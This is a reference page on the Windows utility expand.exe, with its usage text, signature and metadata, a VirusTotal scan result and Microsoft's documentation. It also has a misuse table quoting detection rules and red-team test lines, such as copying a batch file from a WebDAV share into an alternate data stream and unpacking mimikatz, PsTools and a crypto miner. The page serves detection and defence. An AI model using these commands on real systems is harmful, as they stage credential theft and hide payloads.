expand.exe

  • File Path: C:\WINDOWS\system32\expand.exe
  • Description: LZ Expansion Utility

Runtime Data

Usage (stdout):

Microsoft (R) File Expansion Utility
Copyright (c) Microsoft Corporation. All rights reserved.

Expands one or more compressed files.

EXPAND [-R] Source Destination
EXPAND -R Source [Destination]
EXPAND -I Source [Destination]
EXPAND -D Source.cab [-F:Files]
EXPAND Source.cab -F:Files Destination

  -R		Rename expanded files.
  -I		Rename expanded files but ignore directory structure.
  -D		Display list of files in source.
  Source	Source file specification.  Wildcards may be used.
  -F:Files	Name of files to expand from a .CAB.
  Destination	Destination file | path specification.
		Destination may be a directory.
		If Source is multiple files and -r is not specified,
		Destination must be a directory.

Loaded Modules:

Path
C:\WINDOWS\system32\expand.exe
C:\WINDOWS\System32\KERNEL32.DLL
C:\WINDOWS\System32\KERNELBASE.dll
C:\WINDOWS\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: expand
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 5.00 (WinBuild.160101.0800)
  • Product Version: 5.00
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/74
  • VirusTotal Link: https://www.virustotal.com/gui/file/3d5bd1fd4ce50c491af6a82a764c39028063b95f25c954092fff54c60fa57cf9/detection

Possible Misuse

The following table contains possible examples of expand.exe being misused. While expand.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\expand.exe' DRL 1.0
sigma posh_pm_decompress_commands.yml Payload|contains: 'Expand-Archive' DRL 1.0
sigma proc_creation_win_expand_cabinet_files.yml description: Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack DRL 1.0
sigma proc_creation_win_expand_cabinet_files.yml - '\expand.exe' DRL 1.0
LOLBAS Expand.yml Name: Expand.exe  
LOLBAS Expand.yml - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat  
LOLBAS Expand.yml - Command: expand c:\ADS\file1.bat c:\ADS\file2.bat  
LOLBAS Expand.yml - Command: expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat  
LOLBAS Expand.yml - Path: C:\Windows\System32\Expand.exe  
LOLBAS Expand.yml - Path: C:\Windows\SysWOW64\Expand.exe  
atomic-red-team T1003.001.md Expand-Archive $zippath $parentpath\wce -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.001.md Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.004.md Expand-Archive $env:TEMP\PSTools.zip $env:TEMP\PSTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1003.006.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1021.001.md Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the Accessibility Features technique for Persistence.(Citation: Alperovitch Malware) MIT License. © 2018 Red Canary
atomic-red-team T1021.002.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1027.md Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip" -Force MIT License. © 2018 Red Canary
atomic-red-team T1036.md Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force MIT License. © 2018 Red Canary
atomic-red-team T1048.002.md Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl MIT License. © 2018 Red Canary
atomic-red-team T1055.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1055.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1055.012.md $ppid=Get-Process #{parent_process_name} | select -expand id MIT License. © 2018 Red Canary
atomic-red-team T1071.001.md Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl MIT License. © 2018 Red Canary
atomic-red-team T1090.003.md expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor" MIT License. © 2018 Red Canary
atomic-red-team T1095.md Expand-Archive $zippath $parentpath -Force MIT License. © 2018 Red Canary
atomic-red-team T1105.md Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md $ppid=Get-Process #{parent_process_name} | select -expand id MIT License. © 2018 Red Canary
atomic-red-team T1207.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1207.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1485.md Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force MIT License. © 2018 Red Canary
atomic-red-team T1548.002.md Expand-Archive $env:TEMP\uacme.zip $env:TEMP\uacme -Force MIT License. © 2018 Red Canary
atomic-red-team T1550.002.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force MIT License. © 2018 Red Canary
atomic-red-team T1550.003.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary’s objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator). MIT License. © 2018 Red Canary
atomic-red-team T1555.003.md Expand-Archive #{file_path}\Modified-SysInternalsSuite.zip #{file_path}\sysinternals -Force MIT License. © 2018 Red Canary
atomic-red-team T1558.001.md $domain = gwmi Win32_ComputerSystem | Select -Expand Domain MIT License. © 2018 Red Canary
atomic-red-team T1558.001.md Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Expand-Archive $env:TEMP\Sysmon.zip $env:TEMP\Sysmon -Force MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath MIT License. © 2018 Red Canary
atomic-red-team T1562.001.md expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl" MIT License. © 2018 Red Canary
atomic-red-team T1564.004.md expand \\webdav\folder\file.bat #{path}\file.txt:file.bat MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force MIT License. © 2018 Red Canary
atomic-red-team T1588.002.md Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force MIT License. © 2018 Red Canary
signature-base apt_op_honeybee.yar $x1 = "cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32" CC BY-NC 4.0
signature-base gen_pirpi.yar $x1 = "expand.exe1.gif" fullword ascii CC BY-NC 4.0
signature-base gen_pirpi.yar $c1 = "expand.exe" fullword ascii CC BY-NC 4.0
stockpile cc191baa-7472-4386-a2f4-42f203f1acfd.yml Expand-Archive -LiteralPath $download_folder"PSTools.zip" -DestinationPath $staging_folder; Apache-2.0
stockpile 0ef4cc7b-611c-4237-b20b-db36b6906554.yml Expand-Archive -LiteralPath $download_folder"Procdump.zip" -DestinationPath $staging_folder; Apache-2.0
stockpile 46da2385-cf37-49cb-ba4b-a739c7a19de4.yml Expand-Archive -LiteralPath xmrig-6.11.2-msvc-win64.zip -DestinationPath .\; Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


expand

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Expands one or more compressed files. You can also use this command to retrieve compressed files from distribution disks.

The expand command can also run from the Windows Recovery Console, using different parameters. For more information, see Windows Recovery Environment (WinRE).

Syntax

expand [/r] <source> <destination>
expand /r <source> [<destination>]
expand /i <source> [<destination>]
expand /d <source>.cab [/f:<files>]
expand <source>.cab /f:<files> <destination>

Parameters

Parameter Description
/r Renames expanded files.
source Specifies the files to expand. Source can consist of a drive letter and colon, a directory name, a file name, or a combination of these. You can use wildcards (* or ?).
destination Specifies where files are to be expanded. If source consists of multiple files and you don’t specify /r, the destination must be a directory. Destination can consist of a drive letter and colon, a directory name, a file name, or a combination of these. Destination file | path specification.
/i Renames expanded files but ignores the directory structure.
/d Displays a list of files in the source location. Doesn’t expand or extract the files.
/f:<files> Specifies the files in a cabinet (.cab) file that you want to expand. You can use wildcards (* or ?).
/? Displays help at the command prompt.


MIT License. Copyright (c) 2020-2021 Strontic.